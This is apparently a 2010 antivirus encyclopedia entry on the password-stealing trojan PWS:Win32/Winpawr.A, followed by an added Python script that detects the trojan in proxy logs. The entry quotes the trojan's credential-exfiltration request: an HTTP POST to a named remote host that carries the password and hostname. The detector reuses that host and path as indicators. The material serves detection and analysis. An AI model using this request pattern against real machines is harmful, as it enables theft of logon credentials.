PWS:Win32/Winpawr.A
First posted on 13 July 2010.
Source: SecurityHome
Aliases :
PWS:Win32/Winpawr.A is also known as Trojan horse Injector.CK (AVG), Application.VirTool.SMJ (BitDefender).
Explanation :
PWS:Win32/Winpawr.A is a trojan that could be used by other malware to collect user logon credentials and send the sensitive information to a remote server.
Installation
This trojan may be installed by other malware and could be present as a file named "win.dll". File attributes of the trojan component could reference the name "WinLogonHijacker.dll".

Payload
Captures logon credentials
When PWS:Win32/Winpawr.A executes, it attempts to capture user logon credentials and send the information to a remote server "lixian7185.host.zgrdns.com" using HTTP POST. The information is sent as a string as in the following POST example:
lixian7185.host.zgrdns.com/ver/ver.asp?usd=@%06%3F%3F&pwd=<password>&host=<hostname>
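An added detection example, not part of the original analysis: it scans web proxy log lines for the request described above and reports the machine name carried in host= without ever copying the pwd value. The log line format, the sample lines and the function names are assumptions; it also goes one step beyond the page by flagging host-only or request-shape-only matches at lower confidence.

```python
from urllib.parse import urlsplit, parse_qs

# Indicators taken from the description above.
IOC_HOST = "lixian7185.host.zgrdns.com"
IOC_PATH = "/ver/ver.asp"
IOC_PARAMS = {"usd", "pwd", "host"}

# Constructed sample lines in an assumed format:
# <timestamp> <client_ip> <method> <url> <status>
SAMPLE_LOG = [
    "2010-07-13T09:14:02Z 10.0.5.23 POST http://lixian7185.host.zgrdns.com"
    "/ver/ver.asp?usd=@%06%3F%3F&pwd=REDACTED&host=WS-ACCT-07 200",
    "2010-07-13T09:14:05Z 10.0.5.40 GET http://intranet.example/ver/index.html 200",
    "2010-07-13T09:15:11Z 10.0.5.31 GET http://lixian7185.host.zgrdns.com/ 404",
    "2010-07-13T09:16:40Z 10.0.5.52 POST http://198.51.100.9/VER/ver.asp"
    "?usd=a&pwd=&host=LAB-02 200",
]

def classify_request(method, url):
    """Return (confidence, reported_host); confidence is 'high', 'medium' or None."""
    # Logs may record the URL with or without a scheme.
    has_scheme = url.lower().startswith(("http://", "https://"))
    parts = urlsplit(url if has_scheme else "http://" + url)
    params = {k.lower(): v for k, v in
              parse_qs(parts.query, keep_blank_values=True).items()}
    host_hit = (parts.hostname or "").lower() == IOC_HOST
    shape_hit = parts.path.lower() == IOC_PATH and IOC_PARAMS <= params.keys()
    # Machine name sent in host=; the pwd value is never copied out.
    reported = params.get("host", [""])[0]
    if host_hit and shape_hit and method.upper() == "POST":
        return "high", reported
    if host_hit or shape_hit:
        return "medium", reported
    return None, reported

def scan_proxy_log(lines):
    """Return one finding per log line that matches the indicators."""
    findings = []
    for line in lines:
        fields = line.split()
        if len(fields) != 5:
            continue  # skip lines that do not fit the assumed format
        ts, client, method, url, _status = fields
        level, reported = classify_request(method, url)
        if level:
            findings.append({"time": ts, "client": client,
                             "confidence": level, "reported_host": reported})
    return findings
```

A "high" finding identifies both the client IP and the machine name whose logon credentials should be treated as exposed and reset.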
Analysis by Marianne Mallen
Last update 13 July 2010